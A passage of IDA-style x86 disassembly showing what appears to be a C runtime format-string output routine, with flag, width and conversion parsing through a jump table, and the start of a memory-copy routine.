var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-1F8h]
sub esp, 278h
mov eax, dword_423064
xor eax, ebp
mov [ebp+1F8h+var_4], eax
mov eax, [ebp+1F8h+arg_0]
push ebx
mov ebx, [ebp+1F8h+arg_4]
push esi
xor esi, esi
push edi
mov edi, [ebp+1F8h+arg_C]
push [ebp+1F8h+arg_8]
lea ecx, [ebp+1F8h+var_25C]
mov [ebp+1F8h+var_228], eax
mov [ebp+1F8h+var_224], edi
mov [ebp+1F8h+var_244], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_218], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_23C], esi
call sub_402AEB
cmp [ebp+1F8h+var_228], esi
jnz short loc_406E14
loc_406DE7: ; CODE XREF: sub_406D87+E5j
; sub_406D87+138j ...
call sub_405B83
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
push esi
loc_406DF7: ; CODE XREF: sub_406D87+948j
call sub_403305
add esp, 14h
cmp [ebp+1F8h+var_250], 0
jz short loc_406E0C
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_406E0C: ; CODE XREF: sub_406D87+7Cj
or eax, 0FFFFFFFFh
jmp loc_4076E4
; ---------------------------------------------------------------------------
loc_406E14: ; CODE XREF: sub_406D87+5Ej
mov eax, [ebp+1F8h+var_228]
test byte ptr [eax+0Ch], 40h
jnz loc_406EC5
push eax
call sub_408DD0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406E63
push [ebp+1F8h+var_228]
call sub_408DD0
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406E63
push [ebp+1F8h+var_228]
call sub_408DD0
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:435820h[eax*4]
call sub_408DD0
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406E68
; ---------------------------------------------------------------------------
loc_406E63: ; CODE XREF: sub_406D87+A4j
; sub_406D87+B2j
mov eax, offset dword_423BD0
loc_406E68: ; CODE XREF: sub_406D87+DAj
test byte ptr [eax+24h], 7Fh
jnz loc_406DE7
push [ebp+1F8h+var_228]
call sub_408DD0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_406EB6
push [ebp+1F8h+var_228]
call sub_408DD0
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_406EB6
push [ebp+1F8h+var_228]
call sub_408DD0
push [ebp+1F8h+var_228]
sar eax, 5
lea esi, ds:435820h[eax*4]
call sub_408DD0
and eax, 1Fh
imul eax, 28h
add eax, [esi]
pop ecx
pop ecx
xor esi, esi
jmp short loc_406EBB
; ---------------------------------------------------------------------------
loc_406EB6: ; CODE XREF: sub_406D87+F7j
; sub_406D87+105j
mov eax, offset dword_423BD0
loc_406EBB: ; CODE XREF: sub_406D87+12Dj
test byte ptr [eax+24h], 80h
jnz loc_406DE7
loc_406EC5: ; CODE XREF: sub_406D87+94j
cmp ebx, esi
jz loc_406DE7
mov dl, [ebx]
xor ecx, ecx
test dl, dl
mov [ebp+1F8h+var_22C], esi
mov [ebp+1F8h+var_220], esi
mov [ebp+1F8h+var_24C], esi
mov [ebp+1F8h+var_211], dl
jz loc_4076D4
loc_406EE5: ; CODE XREF: sub_406D87+931j
inc ebx
cmp [ebp+1F8h+var_22C], 0
mov [ebp+1F8h+var_240], ebx
jl loc_4076D4
mov al, dl
sub al, 20h
cmp al, 58h
ja short loc_406F0C
movsx eax, dl
movzx eax, ds:byte_41D4E8[eax]
and eax, 0Fh
xor esi, esi
jmp short loc_406F10
; ---------------------------------------------------------------------------
loc_406F0C: ; CODE XREF: sub_406D87+172j
xor esi, esi
xor eax, eax
loc_406F10: ; CODE XREF: sub_406D87+183j
movsx eax, ds:byte_41D508[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+1F8h+var_26C], eax
ja loc_4076A4 ; default
jmp ds:off_4076FF[eax*4] ; switch jump
loc_406F30: ; DATA XREF: .text:off_4076FFo
or [ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00406F29 case 1
mov [ebp+1F8h+var_270], esi
mov [ebp+1F8h+var_248], esi
mov [ebp+1F8h+var_238], esi
mov [ebp+1F8h+var_234], esi
mov [ebp+1F8h+var_210], esi
mov [ebp+1F8h+var_23C], esi
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406F4B: ; CODE XREF: sub_406D87+1A2j
; DATA XREF: .text:off_4076FFo
movsx eax, dl ; jumptable 00406F29 case 2
sub eax, 20h
jz short loc_406F91
sub eax, 3
jz short loc_406F85
sub eax, 8
jz short loc_406F7C
dec eax
dec eax
jz short loc_406F73
sub eax, 3
jnz loc_4076A4 ; default
or [ebp+1F8h+var_210], 8
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406F73: ; CODE XREF: sub_406D87+1D8j
or [ebp+1F8h+var_210], 4
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406F7C: ; CODE XREF: sub_406D87+1D4j
or [ebp+1F8h+var_210], 1
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406F85: ; CODE XREF: sub_406D87+1CFj
or [ebp+1F8h+var_210], 80h
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406F91: ; CODE XREF: sub_406D87+1CAj
or [ebp+1F8h+var_210], 2
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406F9A: ; CODE XREF: sub_406D87+1A2j
; DATA XREF: .text:off_4076FFo
cmp dl, 2Ah ; jumptable 00406F29 case 3
jnz short loc_406FBF
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_238], edi
jge loc_4076A4 ; default
or [ebp+1F8h+var_210], 4
neg [ebp+1F8h+var_238]
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406FBF: ; CODE XREF: sub_406D87+216j
mov eax, [ebp+1F8h+var_238]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_238], eax
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406FD4: ; CODE XREF: sub_406D87+1A2j
; DATA XREF: .text:off_4076FFo
mov [ebp+1F8h+var_218], esi ; jumptable 00406F29 case 4
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406FDC: ; CODE XREF: sub_406D87+1A2j
; DATA XREF: .text:off_4076FFo
cmp dl, 2Ah ; jumptable 00406F29 case 5
jnz short loc_406FFE
add edi, 4
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
cmp edi, esi
mov [ebp+1F8h+var_218], edi
jge loc_4076A4 ; default
or [ebp+1F8h+var_218], 0FFFFFFFFh
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_406FFE: ; CODE XREF: sub_406D87+258j
mov eax, [ebp+1F8h+var_218]
imul eax, 0Ah
movsx ecx, dl
lea eax, [eax+ecx-30h]
mov [ebp+1F8h+var_218], eax
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_407013: ; CODE XREF: sub_406D87+1A2j
; DATA XREF: .text:off_4076FFo
cmp dl, 49h ; jumptable 00406F29 case 6
jz short loc_40705E
cmp dl, 68h
jz short loc_407055
cmp dl, 6Ch
jz short loc_407037
cmp dl, 77h
jnz loc_4076A4 ; default
or [ebp+1F8h+var_210], 800h
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_407037: ; CODE XREF: sub_406D87+299j
cmp byte ptr [ebx], 6Ch
jnz short loc_40704C
inc ebx
or [ebp+1F8h+var_210], 1000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_40704C: ; CODE XREF: sub_406D87+2B3j
or [ebp+1F8h+var_210], 10h
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_407055: ; CODE XREF: sub_406D87+294j
or [ebp+1F8h+var_210], 20h
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_40705E: ; CODE XREF: sub_406D87+28Fj
mov al, [ebx]
cmp al, 36h
jnz short loc_40707B
cmp byte ptr [ebx+1], 34h
jnz short loc_40707B
inc ebx
inc ebx
or [ebp+1F8h+var_210], 8000h
mov [ebp+1F8h+var_240], ebx
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_40707B: ; CODE XREF: sub_406D87+2DBj
; sub_406D87+2E1j
cmp al, 33h
jnz short loc_407096
cmp byte ptr [ebx+1], 32h
jnz short loc_407096
inc ebx
inc ebx
and [ebp+1F8h+var_210], 0FFFF7FFFh
mov [ebp+1F8h+var_240], ebx
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_407096: ; CODE XREF: sub_406D87+2F6j
; sub_406D87+2FCj
cmp al, 64h
jz loc_4076A4 ; default
cmp al, 69h
jz loc_4076A4 ; default
cmp al, 6Fh
jz loc_4076A4 ; default
cmp al, 75h
jz loc_4076A4 ; default
cmp al, 78h
jz loc_4076A4 ; default
cmp al, 58h
jz loc_4076A4 ; default
mov [ebp+1F8h+var_26C], esi
loc_4070C9: ; CODE XREF: sub_406D87+1A2j
; DATA XREF: .text:off_4076FFo
lea eax, [ebp+1F8h+var_25C] ; jumptable 00406F29 case 0
push eax
movzx eax, dl
push eax
mov [ebp+1F8h+var_23C], esi
call sub_40CDB0
pop ecx
test eax, eax
mov al, [ebp+1F8h+var_211]
pop ecx
jz short loc_4070FB
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406CE6
mov al, [ebx]
inc ebx
test al, al
mov [ebp+1F8h+var_240], ebx
jz loc_4076BD
loc_4070FB: ; CODE XREF: sub_406D87+359j
mov ecx, [ebp+1F8h+var_228]
lea esi, [ebp+1F8h+var_22C]
call sub_406CE6
jmp loc_4076A4 ; default
; ---------------------------------------------------------------------------
loc_40710B: ; CODE XREF: sub_406D87+1A2j
; DATA XREF: .text:off_4076FFo
movsx eax, dl ; jumptable 00406F29 case 7
cmp eax, 64h
jg loc_407289
jz loc_407308
cmp eax, 53h
jg loc_4071D1
jz short loc_407182
sub eax, 41h
jz short loc_40713D
dec eax
dec eax
jz short loc_407171
dec eax
dec eax
jz short loc_40713D
dec eax
dec eax
jnz loc_40758C
loc_40713D: ; CODE XREF: sub_406D87+3A4j
; sub_406D87+3ACj
add dl, 20h
mov [ebp+1F8h+var_270], 1
mov [ebp+1F8h+var_211], dl
loc_40714A: ; CODE XREF: sub_406D87+459j
; sub_406D87+51Dj
or [ebp+1F8h+var_210], 40h
cmp [ebp+1F8h+var_218], esi
lea ebx, [ebp+1F8h+var_20C]
mov eax, 200h
mov [ebp+1F8h+var_21C], ebx
mov [ebp+1F8h+var_260], eax
jge loc_40732C
mov [ebp+1F8h+var_218], 6
jmp loc_40737A
; ---------------------------------------------------------------------------
loc_407171: ; CODE XREF: sub_406D87+3A8j
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_4071EE
or [ebp+1F8h+var_210], 800h
jmp short loc_4071EE
; ---------------------------------------------------------------------------
loc_407182: ; CODE XREF: sub_406D87+39Fj
test word ptr [ebp+1F8h+var_210], 830h
jnz short loc_407191
or [ebp+1F8h+var_210], 800h
loc_407191: ; CODE XREF: sub_406D87+401j
; sub_406D87+694j
mov ecx, [ebp+1F8h+var_218]
cmp ecx, 0FFFFFFFFh
jnz short loc_40719E
mov ecx, 7FFFFFFFh
loc_40719E: ; CODE XREF: sub_406D87+410j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
mov edi, [edi-4]
mov [ebp+1F8h+var_21C], edi
jz loc_40756A
cmp edi, esi
jnz short loc_4071C2
mov eax, off_423928
mov [ebp+1F8h+var_21C], eax
loc_4071C2: ; CODE XREF: sub_406D87+431j
mov eax, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_23C], 1
jmp loc_40755F
; ---------------------------------------------------------------------------
loc_4071D1: ; CODE XREF: sub_406D87+399j
sub eax, 58h
jz loc_407413
dec eax
dec eax
jz short loc_40723B
sub eax, ecx
jz loc_40714A
dec eax
dec eax
jnz loc_40758C
loc_4071EE: ; CODE XREF: sub_406D87+3F0j
; sub_406D87+3F9j
add edi, 4
test word ptr [ebp+1F8h+var_210], 810h
mov [ebp+1F8h+var_224], edi
jz short loc_407223
movzx eax, word ptr [edi-4]
push eax
push 200h
lea eax, [ebp+1F8h+var_20C]
push eax
lea eax, [ebp+1F8h+var_220]
push eax
call sub_40DAE2
add esp, 10h
test eax, eax
jz short loc_407230
mov [ebp+1F8h+var_248], 1
jmp short loc_407230
; ---------------------------------------------------------------------------
loc_407223: ; CODE XREF: sub_406D87+473j
mov al, [edi-4]
mov [ebp+1F8h+var_20C], al
mov [ebp+1F8h+var_220], 1
loc_407230: ; CODE XREF: sub_406D87+491j
; sub_406D87+49Aj
lea eax, [ebp+1F8h+var_20C]
mov [ebp+1F8h+var_21C], eax
jmp loc_40758C
; ---------------------------------------------------------------------------
loc_40723B: ; CODE XREF: sub_406D87+455j
mov eax, [edi]
add edi, 4
cmp eax, esi
mov [ebp+1F8h+var_224], edi
jz short loc_407275
mov ecx, [eax+4]
cmp ecx, esi
jz short loc_407275
test word ptr [ebp+1F8h+var_210], 800h
movsx eax, word ptr [eax]
mov [ebp+1F8h+var_21C], ecx
jz short loc_40726D
cdq
sub eax, edx
sar eax, 1
mov [ebp+1F8h+var_23C], 1
jmp loc_407589
; ---------------------------------------------------------------------------
loc_40726D: ; CODE XREF: sub_406D87+4D3j
mov [ebp+1F8h+var_23C], esi
jmp loc_407589
; ---------------------------------------------------------------------------
loc_407275: ; CODE XREF: sub_406D87+4BEj
; sub_406D87+4C5j
mov eax, off_423924
mov [ebp+1F8h+var_21C], eax
push eax
loc_40727E: ; CODE XREF: sub_406D87+680j
call sub_4044E0
pop ecx
jmp loc_407589
; ---------------------------------------------------------------------------
loc_407289: ; CODE XREF: sub_406D87+38Aj
cmp eax, 70h
jg loc_407418
jz loc_40740C
cmp eax, 65h
jl loc_40758C
cmp eax, 67h
jle loc_40714A
cmp eax, 69h
jz short loc_407308
cmp eax, 6Eh
jz short loc_4072D3
cmp eax, 6Fh
jnz loc_40758C
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 8
jz short loc_407313
or [ebp+1F8h+var_210], 200h
jmp short loc_407313
; ---------------------------------------------------------------------------
loc_4072D3: ; CODE XREF: sub_406D87+52Bj
mov esi, [edi]
add edi, 4
mov [ebp+1F8h+var_224], edi
call sub_40D96D
test eax, eax
jz loc_4076BD
test byte ptr [ebp+1F8h+var_210], 20h
jz short loc_4072F7
mov ax, word ptr [ebp+1F8h+var_22C]
mov [esi], ax
jmp short loc_4072FC
; ---------------------------------------------------------------------------
loc_4072F7: ; CODE XREF: sub_406D87+565j
mov eax, [ebp+1F8h+var_22C]
mov [esi], eax
loc_4072FC: ; CODE XREF: sub_406D87+56Ej
mov [ebp+1F8h+var_248], 1
jmp loc_407691
; ---------------------------------------------------------------------------
loc_407308: ; CODE XREF: sub_406D87+390j
; sub_406D87+526j
or [ebp+1F8h+var_210], 40h
loc_40730C: ; CODE XREF: sub_406D87+69Cj
mov [ebp+1F8h+var_220], 0Ah
loc_407313: ; CODE XREF: sub_406D87+541j
; sub_406D87+54Aj ...
mov ecx, [ebp+1F8h+var_210]
test cx, cx
jns loc_407462
loc_40731F: ; CODE XREF: sub_406D87+6E0j
mov eax, [edi]
mov edx, [edi+4]
add edi, 8
jmp loc_407497
; ---------------------------------------------------------------------------
loc_40732C: ; CODE XREF: sub_406D87+3D8j
jnz short loc_40733C
cmp dl, 67h
jnz short loc_40737A
mov [ebp+1F8h+var_218], 1
jmp short loc_40737A
; ---------------------------------------------------------------------------
loc_40733C: ; CODE XREF: sub_406D87:loc_40732Cj
cmp [ebp+1F8h+var_218], eax
jle short loc_407344
mov [ebp+1F8h+var_218], eax
loc_407344: ; CODE XREF: sub_406D87+5B8j
cmp [ebp+1F8h+var_218], 0A3h
jle short loc_40737A
mov esi, [ebp+1F8h+var_218]
add esi, 15Dh
push esi
call sub_407AEA
test eax, eax
mov dl, [ebp+1F8h+var_211]
pop ecx
mov [ebp+1F8h+var_24C], eax
jz short loc_407371
mov [ebp+1F8h+var_21C], eax
mov [ebp+1F8h+var_260], esi
mov ebx, eax
jmp short loc_407378
; ---------------------------------------------------------------------------
loc_407371: ; CODE XREF: sub_406D87+5DEj
mov [ebp+1F8h+var_218], 0A3h
loc_407378: ; CODE XREF: sub_406D87+5E8j
xor esi, esi
loc_40737A: ; CODE XREF: sub_406D87+3E5j
; sub_406D87+5AAj ...
mov eax, [edi]
add edi, 8
mov [ebp+1F8h+var_278], eax
mov eax, [edi-4]
mov [ebp+1F8h+var_274], eax
lea eax, [ebp+1F8h+var_25C]
push eax
push [ebp+1F8h+var_270]
movsx eax, dl
push [ebp+1F8h+var_218]
mov [ebp+1F8h+var_224], edi
push eax
push [ebp+1F8h+var_260]
lea eax, [ebp+1F8h+var_278]
push ebx
push eax
push off_423F98
call sub_405543
pop ecx
call eax
mov edi, [ebp+1F8h+var_210]
add esp, 1Ch
and edi, 80h
jz short loc_4073D7
cmp [ebp+1F8h+var_218], esi
jnz short loc_4073D7
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push off_423FA4
call sub_405543
pop ecx
call eax
pop ecx
pop ecx
loc_4073D7: ; CODE XREF: sub_406D87+634j
; sub_406D87+639j
cmp [ebp+1F8h+var_211], 67h
jnz short loc_4073F6
cmp edi, esi
jnz short loc_4073F6
lea eax, [ebp+1F8h+var_25C]
push eax
push ebx
push off_423FA0
call sub_405543
pop ecx
call eax
pop ecx
pop ecx
loc_4073F6: ; CODE XREF: sub_406D87+654j
; sub_406D87+658j
cmp byte ptr [ebx], 2Dh
jnz short loc_407406
or [ebp+1F8h+var_210], 100h
inc ebx
mov [ebp+1F8h+var_21C], ebx
loc_407406: ; CODE XREF: sub_406D87+672j
push ebx
jmp loc_40727E
; ---------------------------------------------------------------------------
loc_40740C: ; CODE XREF: sub_406D87+50Bj
mov [ebp+1F8h+var_218], 8
loc_407413: ; CODE XREF: sub_406D87+44Dj
mov [ebp+1F8h+var_244], ecx
jmp short loc_407439
; ---------------------------------------------------------------------------
loc_407418: ; CODE XREF: sub_406D87+505j
sub eax, 73h
jz loc_407191
dec eax
dec eax
jz loc_40730C
sub eax, 3
jnz loc_40758C
mov [ebp+1F8h+var_244], 27h
loc_407439: ; CODE XREF: sub_406D87+68Fj
test byte ptr [ebp+1F8h+var_210], 80h
mov [ebp+1F8h+var_220], 10h
jz loc_407313
mov al, byte ptr [ebp+1F8h+var_244]
add al, 51h
mov [ebp+1F8h+var_230], 30h
mov [ebp+1F8h+var_22F], al
mov [ebp+1F8h+var_234], 2
jmp loc_407313
; ---------------------------------------------------------------------------
loc_407462: ; CODE XREF: sub_406D87+592j
test cx, 1000h
jnz loc_40731F
add edi, 4
test cl, 20h
jz short loc_40748A
test cl, 40h
mov [ebp+1F8h+var_224], edi
jz short loc_407483
movsx eax, word ptr [edi-4]
jmp short loc_407487
; ---------------------------------------------------------------------------
loc_407483: ; CODE XREF: sub_406D87+6F4j
movzx eax, word ptr [edi-4]
loc_407487: ; CODE XREF: sub_406D87+6FAj
cdq
jmp short loc_40749A
; ---------------------------------------------------------------------------
loc_40748A: ; CODE XREF: sub_406D87+6ECj
test cl, 40h
mov eax, [edi-4]
jz short loc_407495
cdq
jmp short loc_407497
; ---------------------------------------------------------------------------
loc_407495: ; CODE XREF: sub_406D87+709j
xor edx, edx
loc_407497: ; CODE XREF: sub_406D87+5A0j
; sub_406D87+70Cj
mov [ebp+1F8h+var_224], edi
loc_40749A: ; CODE XREF: sub_406D87+701j
test cl, 40h
jz short loc_4074B7
cmp edx, esi
jg short loc_4074B7
jl short loc_4074A9
cmp eax, esi
jnb short loc_4074B7
loc_4074A9: ; CODE XREF: sub_406D87+71Cj
neg eax
adc edx, 0
neg edx
or [ebp+1F8h+var_210], 100h
loc_4074B7: ; CODE XREF: sub_406D87+716j
; sub_406D87+71Aj ...
test word ptr [ebp+1F8h+var_210], 9000h
mov ebx, edx
mov edi, eax
jnz short loc_4074C5
xor ebx, ebx
loc_4074C5: ; CODE XREF: sub_406D87+73Aj
cmp [ebp+1F8h+var_218], 0
jge short loc_4074D4
mov [ebp+1F8h+var_218], 1
jmp short loc_4074E5
; ---------------------------------------------------------------------------
loc_4074D4: ; CODE XREF: sub_406D87+742j
and [ebp+1F8h+var_210], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+1F8h+var_218], eax
jle short loc_4074E5
mov [ebp+1F8h+var_218], eax
loc_4074E5: ; CODE XREF: sub_406D87+74Bj
; sub_406D87+759j
mov eax, edi
or eax, ebx
jnz short loc_4074EF
and [ebp+1F8h+var_234], 0
loc_4074EF: ; CODE XREF: sub_406D87+762j
lea esi, [ebp+1F8h+var_D]
loc_4074F5: ; CODE XREF: sub_406D87+7A0j
mov eax, [ebp+1F8h+var_218]
dec [ebp+1F8h+var_218]
test eax, eax
jg short loc_407505
mov eax, edi
or eax, ebx
jz short loc_407529
loc_407505: ; CODE XREF: sub_406D87+776j
mov eax, [ebp+1F8h+var_220]
cdq
push edx
push eax
push ebx
push edi
call sub_40DB00
add ecx, 30h
cmp ecx, 39h
mov [ebp+1F8h+var_260], ebx
mov edi, eax
mov ebx, edx
jle short loc_407524
add ecx, [ebp+1F8h+var_244]
loc_407524: ; CODE XREF: sub_406D87+798j
mov [esi], cl
dec esi
jmp short loc_4074F5
; ---------------------------------------------------------------------------
loc_407529: ; CODE XREF: sub_406D87+77Cj
lea eax, [ebp+1F8h+var_D]
sub eax, esi
inc esi
test word ptr [ebp+1F8h+var_210], 200h
mov [ebp+1F8h+var_220], eax
mov [ebp+1F8h+var_21C], esi
jz short loc_40758C
test eax, eax
jz short loc_40754B
mov ecx, esi
cmp byte ptr [ecx], 30h
jz short loc_40758C
loc_40754B: ; CODE XREF: sub_406D87+7BBj
dec [ebp+1F8h+var_21C]
mov ecx, [ebp+1F8h+var_21C]
mov byte ptr [ecx], 30h
inc eax
jmp short loc_407589
; ---------------------------------------------------------------------------
loc_407557: ; CODE XREF: sub_406D87+7DAj
dec ecx
cmp [eax], si
jz short loc_407563
inc eax
inc eax
loc_40755F: ; CODE XREF: sub_406D87+445j
cmp ecx, esi
jnz short loc_407557
loc_407563: ; CODE XREF: sub_406D87+7D4j
sub eax, [ebp+1F8h+var_21C]
sar eax, 1
jmp short loc_407589
; ---------------------------------------------------------------------------
loc_40756A: ; CODE XREF: sub_406D87+429j
cmp edi, esi
jnz short loc_407576
mov eax, off_423924
mov [ebp+1F8h+var_21C], eax
loc_407576: ; CODE XREF: sub_406D87+7E5j
mov eax, [ebp+1F8h+var_21C]
jmp short loc_407582
; ---------------------------------------------------------------------------
loc_40757B: ; CODE XREF: sub_406D87+7FDj
dec ecx
cmp byte ptr [eax], 0
jz short loc_407586
inc eax
loc_407582: ; CODE XREF: sub_406D87+7F2j
cmp ecx, esi
jnz short loc_40757B
loc_407586: ; CODE XREF: sub_406D87+7F8j
sub eax, [ebp+1F8h+var_21C]
loc_407589: ; CODE XREF: sub_406D87+4E1j
; sub_406D87+4E9j ...
mov [ebp+1F8h+var_220], eax
loc_40758C: ; CODE XREF: sub_406D87+3B0j
; sub_406D87+461j ...
cmp [ebp+1F8h+var_248], 0
jnz loc_407691
mov eax, [ebp+1F8h+var_210]
test al, 40h
jz short loc_4075C2
test ax, 100h
jz short loc_4075A9
mov [ebp+1F8h+var_230], 2Dh
jmp short loc_4075BB
; ---------------------------------------------------------------------------
loc_4075A9: ; CODE XREF: sub_406D87+81Aj
test al, 1
jz short loc_4075B3
mov [ebp+1F8h+var_230], 2Bh
jmp short loc_4075BB
; ---------------------------------------------------------------------------
loc_4075B3: ; CODE XREF: sub_406D87+824j
test al, 2
jz short loc_4075C2
mov [ebp+1F8h+var_230], 20h
loc_4075BB: ; CODE XREF: sub_406D87+820j
; sub_406D87+82Aj
mov [ebp+1F8h+var_234], 1
loc_4075C2: ; CODE XREF: sub_406D87+814j
; sub_406D87+82Ej
mov ebx, [ebp+1F8h+var_238]
sub ebx, [ebp+1F8h+var_220]
sub ebx, [ebp+1F8h+var_234]
test byte ptr [ebp+1F8h+var_210], 0Ch
jnz short loc_4075E2
push [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
push ebx
push 20h
call sub_406D19
add esp, 0Ch
loc_4075E2: ; CODE XREF: sub_406D87+848j
push [ebp+1F8h+var_234]
mov edi, [ebp+1F8h+var_228]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_230]
call sub_406D3D
test byte ptr [ebp+1F8h+var_210], 8
pop ecx
jz short loc_40760F
test byte ptr [ebp+1F8h+var_210], 4
jnz short loc_40760F
push edi
push ebx
push 30h
lea eax, [ebp+1F8h+var_22C]
call sub_406D19
add esp, 0Ch
loc_40760F: ; CODE XREF: sub_406D87+871j
; sub_406D87+877j
cmp [ebp+1F8h+var_23C], 0
mov eax, [ebp+1F8h+var_220]
jz short loc_407669
test eax, eax
jle short loc_407669
mov esi, [ebp+1F8h+var_21C]
mov [ebp+1F8h+var_260], eax
loc_407622: ; CODE XREF: sub_406D87+8D8j
movzx eax, word ptr [esi]
dec [ebp+1F8h+var_260]
push eax
push 6
lea eax, [ebp+1F8h+var_C]
push eax
lea eax, [ebp+1F8h+var_268]
inc esi
push eax
inc esi
call sub_40DAE2
add esp, 10h
test eax, eax
jnz short loc_407663
cmp [ebp+1F8h+var_268], eax
jz short loc_407663
push [ebp+1F8h+var_268]
lea eax, [ebp+1F8h+var_22C]
lea ecx, [ebp+1F8h+var_C]
call sub_406D3D
cmp [ebp+1F8h+var_260], 0
pop ecx
jnz short loc_407622
jmp short loc_407676
; ---------------------------------------------------------------------------
loc_407663: ; CODE XREF: sub_406D87+8BBj
; sub_406D87+8C0j
or [ebp+1F8h+var_22C], 0FFFFFFFFh
jmp short loc_407676
; ---------------------------------------------------------------------------
loc_407669: ; CODE XREF: sub_406D87+88Fj
; sub_406D87+893j
mov ecx, [ebp+1F8h+var_21C]
push eax
lea eax, [ebp+1F8h+var_22C]
call sub_406D3D
pop ecx
loc_407676: ; CODE XREF: sub_406D87+8DAj
; sub_406D87+8E0j
cmp [ebp+1F8h+var_22C], 0
jl short loc_407691
test byte ptr [ebp+1F8h+var_210], 4
jz short loc_407691
push edi
push ebx
push 20h
lea eax, [ebp+1F8h+var_22C]
call sub_406D19
add esp, 0Ch
loc_407691: ; CODE XREF: sub_406D87+57Cj
; sub_406D87+809j ...
cmp [ebp+1F8h+var_24C], 0
jz short loc_4076A4 ; default
push [ebp+1F8h+var_24C]
call sub_4039CF
and [ebp+1F8h+var_24C], 0
pop ecx
loc_4076A4: ; CODE XREF: sub_406D87+19Cj
; sub_406D87+1BFj ...
mov ebx, [ebp+1F8h+var_240] ; default
mov al, [ebx]
test al, al
mov [ebp+1F8h+var_211], al
jz short loc_4076D4
mov ecx, [ebp+1F8h+var_26C]
mov edi, [ebp+1F8h+var_224]
mov dl, al
jmp loc_406EE5
; ---------------------------------------------------------------------------
loc_4076BD: ; CODE XREF: sub_406D87+36Ej
; sub_406D87+55Bj
call sub_405B83
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
jmp loc_406DF7
; ---------------------------------------------------------------------------
loc_4076D4: ; CODE XREF: sub_406D87+158j
; sub_406D87+166j ...
cmp [ebp+1F8h+var_250], 0
jz short loc_4076E1
mov eax, [ebp+1F8h+var_254]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4076E1: ; CODE XREF: sub_406D87+951j
mov eax, [ebp+1F8h+var_22C]
loc_4076E4: ; CODE XREF: sub_406D87+88j
mov ecx, [ebp+1F8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 1F8h
leave
retn
sub_406D87 endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_4076FF dd offset loc_4070C9 ; DATA XREF: sub_406D87+1A2r
dd offset loc_406F30 ; jump table for switch statement
dd offset loc_406F4B
dd offset loc_406F9A
dd offset loc_406FD4
dd offset loc_406FDC
dd offset loc_407013
dd offset loc_40710B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407720 proc near ; CODE XREF: sub_402F6C+4Dp
; sub_405F00+2DAp ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_407740
cmp edi, eax
jb loc_4078E4
loc_407740: ; CODE XREF: sub_407720+16j
cmp ecx, 100h
jb short loc_407767
cmp dword_435800, 0
jz short loc_407767
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_407767
pop esi
pop edi
pop ebp
jmp sub_40DC1C
; ---------------------------------------------------------------------------
loc_407767: ; CODE XREF: sub_407720+26j
; sub_407720+2Fj ...
test edi, 3
jnz short loc_407784
shr ecx, 2
